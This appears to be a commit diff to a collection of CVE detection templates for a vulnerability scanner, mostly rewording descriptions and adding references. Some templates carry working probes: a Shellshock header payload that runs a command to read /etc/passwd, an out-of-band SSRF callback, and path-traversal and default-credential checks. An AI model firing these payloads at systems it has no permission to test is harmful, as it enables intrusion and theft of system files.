name: Drupal Sql Injetion
name: Drupal SQL Injection
author: princechaddha
severity: high
description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.
remediation: Upgrade to Drupal core 7.32 or later.
reference:
- https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql
- https://nvd.nist.gov/vuln/detail/CVE-2014-3704
- https://www.drupal.org/SA-CORE-2014-005
- http://www.exploit-db.com/exploits/34984
- http://www.exploit-db.com/exploits/34992
- http://www.exploit-db.com/exploits/34993
- http://www.exploit-db.com/exploits/35150
tags: cve,cve2014,drupal,sqli
classification:
cve-id: CVE-2014-3704
requests:
- method: POST
@ -30,3 +35,5 @@ requests:
- "e807f1fcf82d132f9bb018ca6738a19f"
condition: and
part: body
# Enhanced by mp on 2022/02/24

5
cves/2014/CVE-2014-3744.yaml
View File

@ -3,8 +3,9 @@ id: CVE-2014-3744
info:
name: Node.js st module Directory Traversal
author: geeknik
description: Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.
description: A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-3744
- https://github.com/advisories/GHSA-69rr-wvh9-6c4q
- https://snyk.io/vuln/npm:st:20140206
severity: high
@ -28,3 +29,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/02/24

7
cves/2014/CVE-2014-4210.yaml
View File

@ -6,9 +6,12 @@ info:
severity: medium
tags: cve,cve2014,weblogic,oracle,ssrf,oast
reference:
- https://www.oracle.com/security-alerts/cpujul2014.html
- https://nvd.nist.gov/vuln/detail/CVE-2014-4210
- https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
description: "Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services."
description: An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.
classification:
cve-id: CVE-2014-4210
requests:
- method: GET
@ -25,3 +28,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/02/24

8
cves/2014/CVE-2014-4513.yaml
View File

@ -1,12 +1,14 @@
id: CVE-2014-4513
info:
name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting (XSS)
name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.
description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-4513
tags: cve,cve2014,wordpress,xss,wp-plugin
classification:
cve-id: CVE-2014-4513
requests:
- method: GET
@ -28,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

6
cves/2014/CVE-2014-4535.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2014-4535
info:
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
reference:
@ -13,7 +13,7 @@ info:
cvss-score: 6.10
cve-id: CVE-2014-4535
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
description: "A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
requests:
- method: GET
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

6
cves/2014/CVE-2014-4536.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2014-4536
info:
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
reference:
@ -13,7 +13,7 @@ info:
cvss-score: 6.10
cve-id: CVE-2014-4536
cwe-id: CWE-79
description: "Multiple cross-site scripting (XSS) vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter."
description: "Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter."
requests:
- method: GET
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

8
cves/2014/CVE-2014-4539.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2014-4539
info:
name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
reference: |
@ -13,7 +13,7 @@ info:
cvss-score: 6.10
cve-id: CVE-2014-4539
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
description: "A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
requests:
- method: GET
@ -34,4 +34,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/02/24

6
cves/2014/CVE-2014-4544.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2014-4544
info:
name: Podcast Channels < 0.28 - Unauthenticated Reflected XSS
name: Podcast Channels < 0.28 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability.
description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.
reference:
- https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb
- https://nvd.nist.gov/vuln/detail/CVE-2014-4544
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

6
cves/2014/CVE-2014-4550.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2014-4550
info:
name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS
name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
reference: |
@ -13,7 +13,7 @@ info:
cvss-score: 6.10
cve-id: CVE-2014-4550
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter."
description: "A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter."
requests:
- method: GET
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

6
cves/2014/CVE-2014-4558.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2014-4558
info:
name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS
name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
reference: |
@ -13,7 +13,7 @@ info:
cvss-score: 6.10
cve-id: CVE-2014-4558
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter."
description: "A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter."
requests:
- method: GET
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

6
cves/2014/CVE-2014-4561.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2014-4561
info:
name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS
name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
reference: |
@ -13,7 +13,7 @@ info:
cvss-score: 6.10
cve-id: CVE-2014-4561
cwe-id: CWE-79
description: "The ultimate-weather plugin 1.0 for WordPress has XSS"
description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability.
requests:
- method: GET
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

6
cves/2014/CVE-2014-4592.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2014-4592
info:
name: WP Planet <= 0.1 - Unauthenticated Reflected XSS
name: WP Planet <= 0.1 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
reference: |
@ -13,7 +13,7 @@ info:
cvss-score: 6.10
cve-id: CVE-2014-4592
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter."
description: "A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter."
requests:
- method: GET
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

6
cves/2014/CVE-2014-4940.yaml
View File

@ -5,8 +5,10 @@ info:
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
reference: https://www.cvedetails.com/cve/CVE-2014-4940
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-4940
tags: cve,cve2014,wordpress,wp-plugin,lfi
classification:
cve-id: CVE-2014-4940
requests:
- method: GET
@ -23,3 +25,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

6
cves/2014/CVE-2014-5111.yaml
View File

@ -7,8 +7,10 @@ info:
description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
reference: |
- https://www.exploit-db.com/exploits/39351
- https://www.cvedetails.com/cve/CVE-2014-5111
- https://nvd.nist.gov/vuln/detail/CVE-2014-5111
tags: cve,cve2014,lfi,trixbox
classification:
cve-id: CVE-2014-5111
requests:
- method: GET
@ -25,3 +27,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/24

10
cves/2014/CVE-2014-5258.yaml
View File

@ -4,11 +4,13 @@ info:
name: webEdition 6.3.8.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
description: A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-5258
- https://www.exploit-db.com/exploits/34761
- https://www.cvedetails.com/cve/CVE-2014-5258
tags: cve,cve2014,lfi
classification:
cve-id: CVE-2014-5258
requests:
- method: GET
@ -24,4 +26,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/02/25

7
cves/2014/CVE-2014-5368.yaml
View File

@ -4,11 +4,14 @@ info:
name: WordPress Plugin WP Content Source Control - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
description: A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-5368
- https://www.exploit-db.com/exploits/39287
- https://www.cvedetails.com/cve/CVE-2014-5368
tags: cve,cve2014,wordpress,wp-plugin,lfi
classification:
cve-id: CVE-2014-5368
requests:
- method: GET
@ -27,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25

83
cves/2014/CVE-2014-6271.yaml
View File

@ -1,44 +1,49 @@
id: CVE-2014-6271
info:
name: Shellshock
author: pentest_swissky
severity: critical
description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications
reference:
- http://www.kb.cert.org/vuls/id/252743
- http://www.us-cert.gov/ncas/alerts/TA14-268A
tags: cve,cve2014,rce
id: CVE-2014-6271
info:
name: ShellShock
author: pentest_swissky
severity: critical
description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-6271
- https://nvd.nist.gov/vuln/detail/CVE-2014-7169
- http://www.kb.cert.org/vuls/id/252743
- http://www.us-cert.gov/ncas/alerts/TA14-268A
tags: cve,cve2014,rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2014-6271
cwe-id: CWE-78
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/cgi-bin/status"
- "{{BaseURL}}/cgi-bin/stats"
- "{{BaseURL}}/cgi-bin/test"
- "{{BaseURL}}/cgi-bin/status/status.cgi"
- "{{BaseURL}}/test.cgi"
- "{{BaseURL}}/debug.cgi"
- "{{BaseURL}}/cgi-bin/test-cgi"
headers:
Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/cgi-bin/status"
- "{{BaseURL}}/cgi-bin/stats"
- "{{BaseURL}}/cgi-bin/test"
- "{{BaseURL}}/cgi-bin/status/status.cgi"
- "{{BaseURL}}/test.cgi"
- "{{BaseURL}}/debug.cgi"
- "{{BaseURL}}/cgi-bin/test-cgi"
headers:
Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/02/25

10
cves/2014/CVE-2014-6308.yaml
View File

@ -4,9 +4,13 @@ info:
name: Osclass Security Advisory 3.4.1 - Local File Inclusion
author: daffainfo
severity: high
reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html
reference:
- https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html
- https://nvd.nist.gov/vuln/detail/CVE-2014-6308
tags: cve,cve2014,lfi
description: "Directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php."
description: "A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php."
classification:
cve-id: CVE-2014-6308
requests:
- method: GET
@ -23,3 +27,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25

4
cves/2014/CVE-2014-8682.yaml
View File

@ -5,8 +5,8 @@ info:
author: dhiyaneshDK
severity: high
description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
remediation: Upgrade to a supported version of Gog.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-8682
- http://seclists.org/fulldisclosure/2014/Nov/33
- http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html
- https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d
@ -38,4 +38,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/02/04
# Enhanced by mp on 2022/02/25

7
cves/2014/CVE-2014-8799.yaml
View File

@ -4,11 +4,14 @@ info:
name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-8799
- https://www.exploit-db.com/exploits/35346
- https://www.cvedetails.com/cve/CVE-2014-8799
tags: cve,cve2014,wordpress,wp-plugin,lfi
classification:
cve-id: CVE-2014-8799
requests:
- method: GET
@ -29,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25

10
cves/2014/CVE-2014-9094.yaml
View File

@ -1,12 +1,14 @@
id: CVE-2014-9094
info:
name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
name: WordPress DZS-VideoGallery Plugin Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter."
description: "Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter."
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
tags: cve,cve2014,wordpress,xss,wp-plugin
classification:
cve-id: CVE-2014-9094
requests:
- method: GET
@ -27,3 +29,7 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25
# Enhanced by mp on 2022/02/25

8
cves/2014/CVE-2014-9444.yaml
View File

@ -1,14 +1,16 @@
id: CVE-2014-9444
info:
name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting (XSS)
name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting
author: daffainfo
severity: medium
description: The Frontend Uploader WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability.
description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.
reference:
- https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7
- https://nvd.nist.gov/vuln/detail/CVE-2014-9444
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cve-id: CVE-2014-9444
requests:
- method: GET
@ -30,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25

6
cves/2014/CVE-2014-9606.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2014-9606
info:
name: Netsweeper 4.0.8 - Cross Site Scripting Injection
name: Netsweeper 4.0.8 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/.
description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9606
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25

6
cves/2014/CVE-2014-9607.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2014-9607
info:
name: Netsweeper 4.0.4 - Cross Site Scripting Injection
name: Netsweeper 4.0.4 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter.
description: A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9607
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25

6
cves/2014/CVE-2014-9608.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2014-9608
info:
name: Netsweeper 4.0.3 - Cross Site Scripting Injection
name: Netsweeper 4.0.3 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
description: A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9608
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25

4
cves/2014/CVE-2014-9609.yaml
View File

@ -4,7 +4,7 @@ info:
name: Netsweeper 4.0.8 - Directory Traversal
author: daffainfo
severity: medium
description: Directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action.
description: A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9609
@ -29,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25

4
cves/2014/CVE-2014-9614.yaml
View File

@ -4,7 +4,7 @@ info:
name: Netsweeper 4.0.5 - Default Weak Account
author: daffainfo
severity: critical
description: The Web Panel in Netsweeper before 4.0.5 has a default password of branding for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/.
description: The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9614
@ -42,3 +42,5 @@ requests:
part: header
words:
- 'Set-Cookie: webadminU='
# Enhanced by mp on 2022/02/25

6
cves/2014/CVE-2014-9615.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2014-9615
info:
name: Netsweeper 4.0.4 - Cross Site Scripting Injection
name: Netsweeper 4.0.4 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php.
description: A cross-site scripting vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9615
@ -35,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/25

4
cves/2014/CVE-2014-9617.yaml
View File

@ -4,7 +4,7 @@ info:
name: Netsweeper 3.0.6 - Open Redirection
author: daffainfo
severity: medium
description: Netsweeper version 3.0.6 was vulnerable to an Unauthenticated and Authenticated Open Redirect vulnerability.
description: An open redirect vulnerability in remotereporter/load_logfiles.php in Netsweeper before 4.0.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9617
@ -25,3 +25,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
# Enhanced by mp on 2022/02/25

6
cves/2015/CVE-2015-5471.yaml
View File

@ -1,9 +1,11 @@
id: CVE-2015-5471
info:
name: Swim Team <= v1.44.10777 - Local File Inclusion
author: 0x_Akoko
severity: medium
description: The code in ./wp-swimteam/include/user/download.php doesnt sanitize user input from downloading sensitive system files.
description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.
remediation: Upgrade to Swim Team version 1.45 or newer.
reference:
- https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
- http://www.vapid.dhs.org/advisory.php?v=134
@ -30,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/02/25

34
cves/2017/CVE-2017-18598.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2017-18598
info:
name: Qards Plugin - Stored XSS and SSRF
author: pussycat0x
severity: medium
description: The Qards plugin through 2017-10-11 for WordPress has XSS via a remote document specified in the url parameter to html2canvasproxy.php
reference:
- https://wpscan.com/vulnerability/8934
- https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645
- https://nvd.nist.gov/vuln/detail/CVE-2017-18598
tags: cve,cve2017,wordpress,ssrf,xss,wp-plugin,oast
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2017-18598
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- "console.log"

34
cves/2018/CVE-2018-9161.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2018-9161
info:
name: PrismaWEB - Credentials Disclosure
author: gy741
severity: critical
description: The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php
- https://nvd.nist.gov/vuln/detail/CVE-2018-9161
tags: cve,cve2018,prismaweb,exposure
classification:
